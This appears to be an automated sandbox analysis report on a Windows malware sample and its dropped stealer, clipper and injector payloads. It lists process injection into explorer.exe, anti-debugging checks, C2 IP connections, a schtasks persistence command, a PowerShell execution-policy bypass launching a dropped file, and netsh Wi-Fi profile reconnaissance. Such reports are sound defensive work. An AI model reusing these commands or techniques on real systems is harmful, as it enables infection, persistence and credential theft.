Source: explorer.exe, 00000002.00000000.1785022693.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: 4336.tmp.Server.exe.2.dr	Binary or memory string: VMwareVBox
Source: 3CBD.tmp.Installer.exe, 00000005.00000002.2137916265.000000001C0CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\MY
Source: explorer.exe, 00000002.00000000.1783065410.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000000.1787337320.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000002.00000000.1783065410.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\xj40xovMsm.exe	API call chain: ExitProcess graph end node	graph_0-14177
Source: C:\Users\user\Desktop\xj40xovMsm.exe	API call chain: ExitProcess graph end node	graph_0-16463
Source: C:\Windows\explorer.exe	API call chain: ExitProcess graph end node	graph_2-49142
Source: C:\Windows\System32\relog.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\relog.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\relog.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\relog.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\relog.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\relog.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\relog.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe

Code function: 14_2_010F2D4C CheckRemoteDebuggerPresent,

14_2_010F2D4C

Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe

Code function: 6_2_05110B20 LdrInitializeThunk,

6_2_05110B20

Source: C:\Users\user\Desktop\xj40xovMsm.exe

Code function: 0_2_00007FF68A18E93C IsDebuggerPresent,__crtUnhandledException,GetCurrentProcess,TerminateProcess,

0_2_00007FF68A18E93C

Source: C:\Users\user\Desktop\xj40xovMsm.exe

Code function: 0_2_00007FF68A196AC8 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00007FF68A196AC8

Source: C:\Windows\explorer.exe

2_2_08CB167C

Source: C:\Users\user\Desktop\xj40xovMsm.exe

0_2_00007FF68A18384C

Source: C:\Users\user\Desktop\xj40xovMsm.exe

Code function: 0_2_00007FF68A19118C GetProcessHeap,

0_2_00007FF68A19118C

Source: C:\Windows\System32\relog.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\relog.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\relog.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A195CD8 SetUnhandledExceptionFilter,	0_2_00007FF68A195CD8
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A195A00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF68A195A00
Source: C:\Windows\explorer.exe	Code function: 2_2_08CBD0B8 SetUnhandledExceptionFilter,	2_2_08CBD0B8
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3EF290 SetUnhandledExceptionFilter,	2_2_0F3EF290
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3E31A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0F3E31A4
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA345CD8 SetUnhandledExceptionFilter,	47_2_00007FF6AA345CD8
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA345A00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_00007FF6AA345A00
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B15A00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	52_2_00007FF7C9B15A00
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B15CD8 SetUnhandledExceptionFilter,	52_2_00007FF7C9B15CD8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE495CD8 SetUnhandledExceptionFilter,	53_2_00007FF7AE495CD8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE495A00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	53_2_00007FF7AE495A00
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07D5A00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	55_2_00007FF7C07D5A00
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07D5CD8 SetUnhandledExceptionFilter,	55_2_00007FF7C07D5CD8

Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 53A5.tmp.update.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 64.31.40.18 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.119.203.100 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.3.140.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 80	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.232.249.204 7707

.NET source code references suspicious native API functions

Source: 5E16.tmp.aaa.exe.2.dr, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 5E16.tmp.aaa.exe.2.dr, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: 4336.tmp.Server.exe.2.dr, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 4BC4.tmp.Client.exe.2.dr, Decryptor.cs	Reference to suspicious API methods: WinApi.LoadLibrary(sPath + "\\mozglue.dll")
Source: 4BC4.tmp.Client.exe.2.dr, Decryptor.cs	Reference to suspicious API methods: WinApi.GetProcAddress(hNss3, "NSS_Init")

Allocates memory in foreign processes

Source: C:\Windows\System32\relog.exe	Memory allocated: C:\Windows\explorer.exe base: C350000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\System32\relog.exe	Memory allocated: C:\Windows\explorer.exe base: 8B90000 protect: page execute and read and write			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\relog.exe	Memory protected: C:\Windows\explorer.exe base: 8B90000 protect: page execute read			Jump to behavior
Source: C:\Windows\System32\relog.exe	Memory protected: C:\Windows\explorer.exe base: C350000 protect: page execute read			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\explorer.exe

Code function: 2_2_08CBC55C CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,

2_2_08CBC55C

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A183084 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	0_2_00007FF68A183084
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3FE6F0 ??3@YAXPEAX@Z,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	2_2_0F3FE6F0
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA333084 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	47_2_00007FF6AA333084
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B03084 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	52_2_00007FF7C9B03084
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE483084 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	53_2_00007FF7AE483084
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C3084 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	55_2_00007FF7C07C3084

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\relog.exe	Thread created: C:\Windows\explorer.exe EIP: 8B9AD08			Jump to behavior
Source: C:\Windows\System32\relog.exe	Thread created: C:\Windows\explorer.exe EIP: C3696E0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\relog.exe	Memory written: C:\Windows\explorer.exe base: C350000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\System32\relog.exe	Memory written: C:\Windows\explorer.exe base: 8B90000 value starts with: 4D5A			Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\relog.exe	Memory written: PID: 2580 base: C350000 value: 4D			Jump to behavior
Source: C:\Windows\System32\relog.exe	Memory written: PID: 2580 base: 8B90000 value: 4D			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: NULL target: C:\Windows\System32\relog.exe protection: readonly	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: NULL target: C:\Windows\System32\relog.exe protection: readonly
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Section loaded: NULL target: C:\Windows\System32\relog.exe protection: readonly
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Section loaded: NULL target: C:\Windows\System32\relog.exe protection: readonly

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Thread register set: target process: 7152	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Thread register set: target process: 7536
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Thread register set: target process: 7032
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Thread register set: target process: 4916

Modifies the hosts file

Source: C:\Windows\System32\relog.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Memory written: C:\Windows\System32\relog.exe base: F840DC1010	Jump to behavior
Source: C:\Windows\System32\relog.exe	Memory written: C:\Windows\explorer.exe base: C350000	Jump to behavior
Source: C:\Windows\System32\relog.exe	Memory written: C:\Windows\explorer.exe base: 8B90000	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Memory written: C:\Windows\System32\relog.exe base: 84A9170010
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Memory written: C:\Windows\System32\relog.exe base: DD079A5010
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Memory written: C:\Windows\System32\relog.exe base: B2591DE010

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 7
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\jqnnpe.exe "C:\Users\user\AppData\Local\Temp\jqnnpe.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe

Source: explorer.exe, 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, update[1].pack.1.dr	Binary or memory string: Host: http(s)://form\|%s\|%s\|%d\|info\|%d\|%d\|%d\|%d\|%s\|%s\|%d\|%dMozilla\\.\pipe\%sopenAs we walked along the flatblock marina, I was calm on the outside, but thinking all the time. So now it was to be Georgie the general, saying what we should do and what not to do, and Dim as his mindless greeding bulldog. But suddenly I viddied that thinking was for the gloopy ones and that the oomny ones use, like, inspiration and what Bog sends. For now it was lovely music that came to my aid. There was a window open with the stereo on and I viddied right at once what to do.Shell_TrayWndverclsid.exe3264child.dllTrusteer?{%08lX%04lX%lu}\...0 jnn-pa.googleapis.com.googlevideo.com.gstatic.comgoogleapis.com/js//recaptcha/GET/images//img//css//vendors//assets//domainreliability/PRI HTTP/2.0POST/login/login.php/auth/register/sign/sign-in/account/bank/Login/checkout/payment/billingorder.php"
Source: explorer.exe, explorer.exe, 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1784847997.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000002.3139934605.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1783373685.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.3134385875.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1783065410.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000002.00000002.3139934605.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1783373685.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000002.3139934605.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1783373685.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Language, Device and Operating System Detection

Yara detected Keyzetsu Clipper

Source: Yara match	File source: 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2548612553.0000000002897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2548612553.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3CBD.tmp.Installer.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: accc.exe PID: 7324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: accc.exe PID: 6896, type: MEMORYSTR

Yara detected Telegram Recon

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED

Source: C:\Users\user\Desktop\xj40xovMsm.exe

Code function: 0_2_00007FF68A18F1A8 cpuid

0_2_00007FF68A18F1A8

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	0_2_00007FF68A199358
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,	0_2_00007FF68A190CD0
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	0_2_00007FF68A198D34
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	0_2_00007FF68A1991A0
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: GetLocaleInfoEx,	0_2_00007FF68A199254
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00007FF68A196F50
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: EnumSystemLocalesEx,	0_2_00007FF68A196FB8
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,	0_2_00007FF68A196DF4
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	2_2_0C377588
Source: C:\Windows\explorer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_0C375E2C
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,	2_2_0C376E00
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,	2_2_0C36CF8C
Source: C:\Windows\explorer.exe	Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,	2_2_0C36E830
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,	2_2_0C376874
Source: C:\Windows\explorer.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	2_2_0F3E8F1C
Source: C:\Windows\explorer.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	2_2_0F3E9540
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,	2_2_0F3E943C
Source: C:\Windows\explorer.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,_invoke_watson,	2_2_0F3DF430
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,	2_2_0F3E7474
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,	2_2_0F3DDB8C
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	2_2_0F3E9388
Source: C:\Windows\explorer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_0F3E6A2C
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,	2_2_0F3E7A00
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,	2_2_0F3EF1A0
